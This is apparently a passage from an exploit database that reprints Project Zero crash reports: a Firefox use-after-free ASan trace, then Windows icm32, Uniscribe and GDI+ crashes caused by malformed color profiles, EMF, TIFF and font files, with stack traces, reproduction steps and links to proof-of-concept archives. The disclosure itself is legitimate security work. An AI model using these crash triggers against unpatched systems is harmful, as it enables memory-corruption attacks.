#82 0x7f46da4cb9f4 in mozilla::RefreshDriverTimer::Tick(long, mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:327:5
#83 0x7f46da4ce063 in RunRefreshDrivers /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:722:5
#84 0x7f46da4ce063 in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::TickRefreshDriver(mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:631
#85 0x7f46da4c9157 in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::ParentProcessVsyncNotifier::Run() /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:508:9
#86 0x7f46d3c2db89 in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1264:7
#87 0x7f46d3c2a480 in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:389:10
#88 0x7f46d4a43eb4 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/worker/workspace/build/src/ipc/glue/MessagePump.cpp:124:5
#89 0x7f46d49b5028 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:238:3
#90 0x7f46d49b5028 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:231
#91 0x7f46d49b5028 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:211
#92 0x7f46d9ded82f in nsBaseAppShell::Run() /home/worker/workspace/build/src/widget/nsBaseAppShell.cpp:156:3
#93 0x7f46dd430051 in nsAppStartup::Run() /home/worker/workspace/build/src/toolkit/components/startup/nsAppStartup.cpp:283:19
#94 0x7f46dd5edc0c in XREMain::XRE_mainRun() /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4470:10
#95 0x7f46dd5ef708 in XREMain::XRE_main(int, char**, mozilla::BootstrapConfig const&) /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4647:8
#96 0x7f46dd5f09cc in XRE_main(int, char**, mozilla::BootstrapConfig const&) /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4738:16
#97 0x4dfebf in do_main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:234:10
#98 0x4dfebf in main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:305
#99 0x7f46eefdb82f in __libc_start_main /build/glibc-t3gR2i/glibc-2.23/csu/../csu/libc-start.c:291
#100 0x41c2e8 in _start (/home/ifratric/p0/latest/firefox/firefox+0x41c2e8)
0x60b000214ce8 is located 88 bytes inside of 112-byte region [0x60b000214c90,0x60b000214d00)
freed by thread T0 here:
#0 0x4b2a3b in __interceptor_free /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:38:3
#1 0x7f46d3acb2c4 in SnowWhiteKiller::~SnowWhiteKiller() /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2664:9
#2 0x7f46d3acaeb6 in nsCycleCollector::FreeSnowWhite(bool) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2839:3
#3 0x7f46d53d990e in AsyncFreeSnowWhite::Run() /home/worker/workspace/build/src/js/xpconnect/src/XPCJSContext.cpp:145:34
#4 0x7f46d3c2db89 in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1264:7
#5 0x7f46d3c2a480 in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:389:10
#6 0x7f46d4a43ebf in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/worker/workspace/build/src/ipc/glue/MessagePump.cpp:96:21
#7 0x7f46d49b5028 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:238:3
#8 0x7f46d49b5028 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:231
#9 0x7f46d49b5028 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:211
#10 0x7f46d9ded82f in nsBaseAppShell::Run() /home/worker/workspace/build/src/widget/nsBaseAppShell.cpp:156:3
#11 0x7f46dd430051 in nsAppStartup::Run() /home/worker/workspace/build/src/toolkit/components/startup/nsAppStartup.cpp:283:19
#12 0x7f46dd5edc0c in XREMain::XRE_mainRun() /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4470:10
#13 0x7f46dd5ef708 in XREMain::XRE_main(int, char**, mozilla::BootstrapConfig const&) /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4647:8
#14 0x7f46dd5f09cc in XRE_main(int, char**, mozilla::BootstrapConfig const&) /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4738:16
#15 0x4dfebf in do_main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:234:10
#16 0x4dfebf in main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:305
#17 0x7f46eefdb82f in __libc_start_main /build/glibc-t3gR2i/glibc-2.23/csu/../csu/libc-start.c:291
previously allocated by thread T0 here:
#0 0x4b2d5b in malloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:52:3
#1 0x4e10cd in moz_xmalloc /home/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:83:17
#2 0x7f46d6796c00 in operator new /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:194:12
#3 0x7f46d6796c00 in nsRange::CloneRange() const /home/worker/workspace/build/src/dom/base/nsRange.cpp:2495
#4 0x7f46d67970ba in nsRange::CloneRange(nsIDOMRange**) /home/worker/workspace/build/src/dom/base/nsRange.cpp:2507:14
#5 0x7f46d66801d4 in nsHTMLCopyEncoder::SetSelection(nsISelection*) /home/worker/workspace/build/src/dom/base/nsDocumentEncoder.cpp:1426:5
#6 0x7f46d6596c5e in SelectionCopyHelper(nsISelection*, nsIDocument*, bool, short, unsigned int, nsITransferable**) /home/worker/workspace/build/src/dom/base/nsCopySupport.cpp:199:10
#7 0x7f46da97e9ee in nsAutoCopyListener::NotifySelectionChanged(nsIDOMDocument*, nsISelection*, short) /home/worker/workspace/build/src/layout/generic/nsSelection.cpp:6667:10
#8 0x7f46da95f019 in mozilla::dom::Selection::NotifySelectionListeners() /home/worker/workspace/build/src/layout/generic/nsSelection.cpp:6254:5
#9 0x7f46da97806c in NotifySelectionListeners /home/worker/workspace/build/src/layout/generic/nsSelection.cpp:2429:12
#10 0x7f46da97806c in mozilla::dom::Selection::Extend(nsINode&, unsigned int, mozilla::ErrorResult&) /home/worker/workspace/build/src/layout/generic/nsSelection.cpp:5762
#11 0x7f46da9533e7 in Extend /home/worker/workspace/build/src/layout/generic/nsSelection.cpp:5474:3
#12 0x7f46da9533e7 in nsFrameSelection::TakeFocus(nsIContent*, unsigned int, unsigned int, mozilla::CaretAssociationHint, bool, bool) /home/worker/workspace/build/src/layout/generic/nsSelection.cpp:1873
#13 0x7f46da94ebaf in nsFrameSelection::MoveCaret(nsDirection, bool, nsSelectionAmount, nsFrameSelection::CaretMovementStyle) /home/worker/workspace/build/src/layout/generic/nsSelection.cpp:1160:14
#14 0x7f46da97c97d in mozilla::dom::Selection::Modify(nsAString_internal const&, nsAString_internal const&, nsAString_internal const&, mozilla::ErrorResult&) /home/worker/workspace/build/src/layout/generic/nsSelection.cpp:6426:8
#15 0x7f46d730a949 in mozilla::dom::SelectionBinding::modify(JSContext*, JS::Handle<JSObject*>, mozilla::dom::Selection*, JSJitMethodCallArgs const&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/SelectionBinding.cpp:778:3
#16 0x7f46d7fdbf77 in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:2951:13
#17 0x7f46dda78c24 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:281:15
#18 0x7f46dda78c24 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:463
#19 0x7f46dda5ef88 in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:514:12
#20 0x7f46dda5ef88 in Interpret(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2960
#21 0x7f46dda4411a in js::RunScript(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:409:12
#22 0x7f46dda78eb7 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:481:15
#23 0x7f46dda79552 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:527:10
#24 0x7f46de426f3c in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/jsapi.cpp:2865:12
#25 0x7f46d7b59632 in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle<JS::Value>, mozilla::dom::Event&, JS::MutableHandle<JS::Value>, mozilla::ErrorResult&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:260:37
#26 0x7f46d845fbbd in Call<nsISupports *> /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:362:12
#27 0x7f46d845fbbd in mozilla::JSEventHandler::HandleEvent(nsIDOMEvent*) /home/worker/workspace/build/src/dom/events/JSEventHandler.cpp:214
#28 0x7f46d842a6f9 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1123:16
#29 0x7f46d842c5b4 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1297:20
#30 0x7f46d8416eb3 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:465:5
#31 0x7f46d841a744 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray<mozilla::dom::EventTarget*>*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:822:9
#32 0x7f46da62158e in nsDocumentViewer::LoadComplete(nsresult) /home/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:1044:7
#33 0x7f46dcae3e7f in nsDocShell::EndPageLoad(nsIWebProgress*, nsIChannel*, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7632:5
#34 0x7f46dcadfc44 in nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7426:7
#35 0x7f46dcae765f in non-virtual thunk to nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7323:13
SUMMARY: AddressSanitizer: heap-use-after-free /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RefPtr.h:308:36 in operator!
Shadow bytes around the buggy address:
0x0c168003a940: fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa
0x0c168003a950: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fa fa
0x0c168003a960: fa fa fa fa fa fa 00 00 00 00 00 00 00 00 00 00
0x0c168003a970: 00 00 00 fa fa fa fa fa fa fa fa fa fd fd fd fd
0x0c168003a980: fd fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa
=>0x0c168003a990: fa fa fd fd fd fd fd fd fd fd fd fd fd[fd]fd fd
0x0c168003a9a0: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
0x0c168003a9b0: fd fd fd fd fd fd fa fa fa fa fa fa fa fa fd fd
0x0c168003a9c0: fd fd fd fd fd fd fd fd fd fd fd fd fa fa fa fa
0x0c168003a9d0: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
0x0c168003a9e0: fd fd fa fa fa fa fa fa fa fa fd fd fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==119582==ABORTING
-->
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1054
We have encountered a crash in the Windows Color Management library (icm32.dll), in the icm32!LHCalc3toX_Di16_Do16_Lut8_G32 function, while trying to translate colors based on a malformed color profile file:
---
(61e4.8620): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000453 ecx=0922cafd edx=00000c63 esi=0038f7ac edi=0004be40
eip=6ac573e9 esp=0038f6ec ebp=0038f784 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
icm32!LHCalc3toX_Di16_Do16_Lut8_G32+0x32a:
6ac573e9 0fb61411 movzx edx,byte ptr [ecx+edx] ds:002b:0922d760=??
0:000> kb
ChildEBP RetAddr Args to Child
0038f784 6ac57844 0038f7ac 0038f840 00000000 icm32!LHCalc3toX_Di16_Do16_Lut8_G32+0x32a
0038f798 6ac4807d 0038f7ac 0038f840 76f611a9 icm32!LHCalc3to3_Di16_Do16_Lut8_G32+0x12
0038f8ac 6ac4204c 07b46e58 085f1000 000285c3 icm32!LHMatchColorsPrivate+0xef
0038f8c0 6c5ecab5 00000100 07de1000 000285c3 icm32!CMTranslateColors+0x44
0038f940 011c1963 4f42e2c8 07de1000 000285c3 mscms!TranslateColors+0x108
[...]
---
The issue reproduces on Windows 7. It is easiest to reproduce with PageHeap enabled. In order to reproduce the problem with the provided samples, it is necessary to use a dedicated program which loads the file, creates a color transform and translates some colors.
Attached are two color profiles which trigger the crash at two different offsets within the icm32!LHCalc3toX_Di16_Do16_Lut8_G32 function.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41659.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1053
We have encountered a crash in the Windows Uniscribe user-mode library, in the USP10!ScriptApplyLogicalWidth function, while trying to display a malformed EMF file:
---
(920c.9190): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=001e6fe4 ebx=00000000 ecx=00000007 edx=00000000 esi=00000007 edi=00000007
eip=751e6f3c esp=002ef0c8 ebp=002ef0ec iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
USP10!ScriptApplyLogicalWidth+0x10c:
751e6f3c 8b04b8 mov eax,dword ptr [eax+edi*4] ds:002b:001e7000=????????
0:000> kb
ChildEBP RetAddr Args to Child
002ef0ec 751f4039 001e6fe4 0000008f 0000008f USP10!ScriptApplyLogicalWidth+0x10c
002ef140 751f435d 00000105 002ef170 0a6a1cbc USP10!ApplyPiDxToItem+0x89
002ef184 751e7a04 ffffffff 00000004 000000a0 USP10!ScriptStringAnalyzeGlyphs+0x20d
002ef19c 76ca5465 1d011f2d 0a6a1bd8 00001000 USP10!ScriptStringAnalyse+0x284
002ef1e8 76ca3a3d 1d011f2d 0935f000 00001000 LPK!LpkStringAnalyse+0xe5
002ef238 76ca3af2 1d011f2d 00000064 00000064 LPK!InternalTextOut+0x1cd
002ef26c 76ccda50 1d011f2d 00000064 00000064 LPK!LpkExtTextOut+0x32
002ef7d8 76ccda90 1d011f2d 00000064 00000064 GDI32!ExtTextOutInternalA+0x3aa
002ef804 76ce7fed 1d011f2d 00000064 00000064 GDI32!ExtTextOutA+0x24
002ef838 76cd50cd 1d011f2d 04ed8ff8 00000002 GDI32!MREXTTEXTOUT::bPlay+0x7f
002ef8b0 6c85fc37 1d011f2d 04ed8ff8 001e01e8 GDI32!PlayEnhMetaFileRecord+0x2c5
002ef8c8 6c860e3a 00000053 07bdbcb0 00006044 gdiplus!EmfEnumState::PlayRecord+0x3a
002ef8e0 6c83881a 00000053 00006044 001e01f0 gdiplus!EmfEnumState::ProcessRecord+0xb1
002ef8fc 6c8389e0 00000053 00000000 00006044 gdiplus!GdipPlayMetafileRecordCallback+0x6c
002ef924 76cd58a4 1d011f2d 04ed8ff8 001e01f0 gdiplus!EnumEmfDownLevel+0x6e
002ef9b0 6c83abb4 1d011f2d 403581b3 6c838972 GDI32!bInternalPlayEMF+0x6a3
002ef9e8 6c83d317 1d011f2d 924626c1 002efa74 gdiplus!MetafilePlayer::EnumerateEmfRecords+0x104
002efa90 6c83f3c1 00000000 924626c1 002efbd8 gdiplus!GpGraphics::EnumEmf+0x391
002efbf0 6c8448c9 00000000 00000001 00000001 gdiplus!GpMetafile::EnumerateForPlayback+0x5a7
002efcec 6c84494d 07bd5f28 00000000 00000000 gdiplus!GpGraphics::DrawImage+0x3f5
002efd50 6c80e03f 07bd5f28 002efd78 002efd88 gdiplus!GpGraphics::DrawImage+0x51
002efdb8 6c80e0d3 07bd1d28 438f3857 00000000 gdiplus!GdipDrawImage+0x130
002efde4 013e1747 07bd1d28 07bd5f28 00000000 gdiplus!GdipDrawImageI+0x49
[...]
---
The issue reproduces on Windows 7. It is easiest to reproduce with PageHeap enabled. In order to reproduce the problem with the provided samples, it might be necessary to use a custom program which displays images using GDI+, or any existing GDI+ client (such as Microsoft Office).
Attached is an EMF file which triggers the crash.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41658.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1052
We have encountered a crash in the Windows Color Management library (icm32.dll), in the icm32!Fill_ushort_ELUTs_from_lut16Tag function, while trying to display a TIFF image with a malformed embedded color profile:
---
(7c1c.93b0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000001 ebx=0028f0dc ecx=0984f7c0 edx=00006ff0 esi=0980f800 edi=00000100
eip=6ac4f701 esp=0028ecc8 ebp=0028ecf4 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210206
icm32!Fill_ushort_ELUTs_from_lut16Tag+0xe4:
6ac4f701 0fb711 movzx edx,word ptr [ecx] ds:002b:0984f7c0=????
0:000> kb
ChildEBP RetAddr Args to Child
0028ecf4 6ac495bd 0028f0dc ff837f84 00004000 icm32!Fill_ushort_ELUTs_from_lut16Tag+0xe4
0028ed28 6ac4b117 0028f0dc 0028ef54 00002100 icm32!ExtractElutFromLut16+0xec
0028ed80 6ac4ca1d 0028f0dc 0028ef54 41324230 icm32!ExtractAll_MFT_LutsFromLut16+0x10a
0028edac 6ac4ccbf 0028f0dc 0028ef54 41324230 icm32!ExtractAll_MFT_Luts+0x8c
0028ee3c 6ac4d562 0028f0dc 0028ef54 00000000 icm32!ExtractAllLuts+0x257
0028f148 6ac4e947 0953ee58 09534ff0 061f7f70 icm32!CreateCombi+0x725
0028f2ec 6ac43c84 0953ee58 09534ff0 00000000 icm32!PrepareCombiLUTs+0x3a6
0028f498 6ac42dba 0953ee58 09534ff0 09534ff0 icm32!CMMConcatInitPrivate+0x23e
0028f4b4 6ac41630 0028f520 09534ff0 0028f5c4 icm32!CWConcatColorWorld4MS+0x42
0028f4e0 6ac41fce 0028f520 00180002 00000000 icm32!CMCreateMultiProfileTransformInternal+0x10b
0028f508 6c5ec8af 0028f5bc 00000002 0028f5c4 icm32!CMCreateMultiProfileTransform+0x20
0028f57c 6d2fd7c8 0028f5bc 00000002 0028f5c4 mscms!CreateMultiProfileTransform+0x22d
0028f5a0 6d2fb62c 0028f5bc 0028f5c4 00000000 WindowsCodecsExt!ICMModule::CreateMultiProfileTransform+0x27
0028f5d4 6d2f58cd 06277f90 40c8e2f0 40cf42f0 WindowsCodecsExt!CIcmColorTransform::CreateVectorTransform+0x6f
0028f640 69b25e74 09744f88 0970afac 0028f6b4 WindowsCodecsExt!CFormatConverterNChannel::Initialize+0x4b2
0028f6d8 6c8ea4be 0970cf90 0970afac 0028f710 WindowsCodecs!CFormatConverterResolver::Initialize+0x318
0028f724 6c8ec909 0010300c 00000000 07b67f68 gdiplus!GpWicDecoder::InitFormatConverter+0x7e
0028f760 6c8e9d72 00000000 07b55fd0 07b4df98 gdiplus!GpWicDecoder::DecodeFrame+0xb5
0028f774 6c8ddeb8 07b67f68 07b4df98 07b4df98 gdiplus!GpWicDecoder::GetImageInfo+0x29
0028f798 6c8de328 07b4df98 0000027f 07b4df38 gdiplus!GpDecodedImage::InternalGetImageInfo+0x3f
0028f7b8 6c830aee 07b55fd0 07b4df98 07b4bcd8 gdiplus!GpDecodedImage::GetImageInfo+0x18
0028f7cc 6c832cd3 0028f880 0028f7e8 6c83330d gdiplus!CopyOnWriteBitmap::CopyOnWriteBitmap+0x48
0028f7d8 6c83330d 0028f880 07b45f28 0028f7f8 gdiplus!CopyOnWriteBitmap::Create+0x1d
0028f7e8 6c8342aa 0028f880 07b43ff4 0028f81c gdiplus!GpBitmap::GpBitmap+0x2c
0028f7f8 6c803e8d 0028f880 085a1000 07b43ff0 gdiplus!GpImage::LoadImageW+0x69
0028f81c 003b171f 0028f880 07b43ff4 b2121dcf gdiplus!GdipLoadImageFromFile+0x74
[...]
---
The issue reproduces on Windows 7. It is easiest to reproduce with PageHeap enabled. In order to reproduce the problem with the provided samples, it might be necessary to use a custom program which displays images using GDI+, or any existing GDI+ client (such as Microsoft Office).
Attached is a TIFF file which triggers the crash.
################################################################################
A similar crash with a slightly different stack trace was also encountered in the icm32!Fill_byte_ALUTs_from_lut16Tag function:
---
(62a8.4d70): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=000001fe ebx=09222000 ecx=09220ffe edx=00000801 esi=000003fc edi=0924d3f8
eip=6ac4f821 esp=002bf594 ebp=002bf5b8 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
icm32!Fill_byte_ALUTs_from_lut16Tag+0x9a:
6ac4f821 0fb711 movzx edx,word ptr [ecx] ds:002b:09220ffe=????
0:000> kb
ChildEBP RetAddr Args to Child
002bf5b8 6ac4aa4d 002bf9a0 00000801 0924d3f8 icm32!Fill_byte_ALUTs_from_lut16Tag+0x9a
002bf5ec 6ac4b0f3 0002a000 002bf818 00007000 icm32!ExtractAlutFromLut16+0xe2
002bf644 6ac4ca1d 002bf9a0 002bf818 42324130 icm32!ExtractAll_MFT_LutsFromLut16+0xe6
002bf670 6ac4cd0d 002bf9a0 002bf818 42324130 icm32!ExtractAll_MFT_Luts+0x8c
002bf700 6ac4d562 002bf9a0 002bf818 00000000 icm32!ExtractAllLuts+0x2a5
002bfa0c 6ac4e947 07c46e58 07c44fe8 07c48ef8 icm32!CreateCombi+0x725
002bfbb0 6ac43c84 07c46e58 07c44fe8 00000000 icm32!PrepareCombiLUTs+0x3a6
002bfd5c 6ac42dba 07c46e58 07c44fe8 07c44fe8 icm32!CMMConcatInitPrivate+0x23e
002bfd78 6ac41630 002bfde4 07c44fe8 002bfea8 icm32!CWConcatColorWorld4MS+0x42
002bfda4 6ac41fce 002bfde4 00080000 00000000 icm32!CMCreateMultiProfileTransformInternal+0x10b
002bfdcc 6c5ec8af 002bfe98 00000004 002bfea8 icm32!CMCreateMultiProfileTransform+0x20
002bfe40 011c1923 002bfe98 00000004 002bfea8 mscms!CreateMultiProfileTransform+0x22d
[...]
---
Attached is a color profile which triggers the above crash. In order to reproduce it, it is necessary to use a dedicated program which loads the file and creates a color transform.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41657.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1042
We have encountered a crash in the Windows GDI+ library, in the gdiplus!GetRECTSForPlayback function, while trying to display a malformed EMF+ image file:
---
(6be8.6f1c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=ffffadd6 ecx=000c1000 edx=00000000 esi=0000348f edi=00000000
eip=6c83a189 esp=0023f21c ebp=0023f238 iopl=0 nv up ei pl nz ac pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010216
gdiplus!GetRECTSForPlayback+0xe2:
6c83a189 8a11 mov dl,byte ptr [ecx] ds:002b:000c1000=??
0:000> kb
ChildEBP RetAddr Args to Child
0023f238 6c83c8a3 000001e0 00000018 00000800 gdiplus!GetRECTSForPlayback+0xe2
0023f294 6c8387e3 07b6bcb0 0000403a 00008800 gdiplus!SetTSClipEPR::Play+0x71
0023f2b4 6c83a88d 0000403a 00008800 00000018 gdiplus!GdipPlayMetafileRecordCallback+0x35
0023f2e4 6c83e32c 00000278 000c013c 000c0000 gdiplus!MetafilePlayer::EnumerateEmfPlusRecords+0x73
0023f2fc 76cd58a4 070125f7 04e18ff8 000c0098 gdiplus!EnumEmfWithDownLevel+0x61
0023f388 6c83abb4 070125f7 403581b3 6c83e2cb GDI32!bInternalPlayEMF+0x6a3
0023f3c0 6c83e5b1 070125f7 08462d83 0023f440 gdiplus!MetafilePlayer::EnumerateEmfRecords+0x104
0023f460 6c83f592 42776037 08462d83 0023f598 gdiplus!GpGraphics::EnumEmfPlusDual+0x1e7
0023f5b0 6c8448c9 00000000 42cc0000 42d80000 gdiplus!GpMetafile::EnumerateForPlayback+0x778
0023f6ac 6c84494d 07b65f28 00000000 00000000 gdiplus!GpGraphics::DrawImage+0x3f5
0023f710 6c80e03f 07b65f28 0023f738 0023f748 gdiplus!GpGraphics::DrawImage+0x51
0023f778 6c80e0d3 07b61d28 4269b097 00000000 gdiplus!GdipDrawImage+0x130
0023f7a4 000e1747 07b61d28 07b65f28 00000000 gdiplus!GdipDrawImageI+0x49
[...]
---
The crash appears to be caused by insufficient validation of the record size in relation to the number of declared rectangles, in the handler of the EmfPlusSetTSClip EMF+ record. It is unclear if the bug can also lead to memory corruption (likely not), but it could still potentially lead to the disclosure of junk/out-of-bounds heap bytes.
The issue reproduces on Windows 7. It is easiest to reproduce with PageHeap enabled. In order to reproduce the problem with the provided samples, it might be necessary to use a custom program which displays images using GDI+, or any existing GDI+ client (such as Microsoft Office).
Attached is an archive with two samples, which trigger crashes at two different offsets within the gdiplus!GetRECTSForPlayback function.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41656.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1031
Through fuzzing, we have discovered a number of different crashes in the Windows Uniscribe user-mode library, while trying to display text using a corrupted font file or calling documented Uniscribe API functions against such malformed fonts. In this bug, we address a variety of crashes manifested through invalid memory READ accesses. Some of them occur at page boundaries, while others occur at seemingly valid yet non-mapped addresses. The sheer number of crashes makes it very difficult for us to assess the root cause, severity and impact of each of them within a reasonable time-frame. Consequently, we have only performed basic deduplication based on the top-level address of the faulting instruction, and are reporting all such crashes in this single bug tracker entry. Note that deduplicating on the faulting address alone is approximate: several of the entries below may share a single root cause, and a single entry may conceal more than one distinct bug.
A summary of the crash locations is as follows:
--------------------------------------------------------------
1 USP10!otlMultiSubstLookup::apply+0xa8
2 USP10!otlSingleSubstLookup::applyToSingleGlyph+0x98
3 USP10!otlSingleSubstLookup::apply+0xa9
4 USP10!otlMultiSubstLookup::getCoverageTable+0x2c
5 USP10!otlMark2Array::mark2Anchor+0x18
6 USP10!GetSubstGlyph+0x2e
7 USP10!BuildTableCache+0x1ca
8 USP10!otlMkMkPosLookup::apply+0x1b4
9 USP10!otlLookupTable::markFilteringSet+0x1a
10 USP10!otlSinglePosLookup::getCoverageTable+0x12
11 USP10!BuildTableCache+0x1e7
12 USP10!otlChainingLookup::getCoverageTable+0x15
13 USP10!otlReverseChainingLookup::getCoverageTable+0x15
14 USP10!otlLigCaretListTable::coverage+0x7
15 USP10!otlMultiSubstLookup::apply+0x99
16 USP10!otlTableCacheData::FindLookupList+0x9
17 USP10!ttoGetTableData+0x4b4
18 USP10!GetSubtableCoverage+0x1ab
19 USP10!otlChainingLookup::apply+0x2d
20 USP10!MergeLigRecords+0x132
21 USP10!otlLookupTable::subTable+0x23
22 USP10!GetMaxParameter+0x53
23 USP10!ApplyLookup+0xc3
24 USP10!ApplyLookupToSingleGlyph+0x6f
25 USP10!ttoGetTableData+0x19f6
26 USP10!otlExtensionLookup::extensionSubTable+0x1d
27 USP10!ttoGetTableData+0x1a77
--------------------------------------------------------------
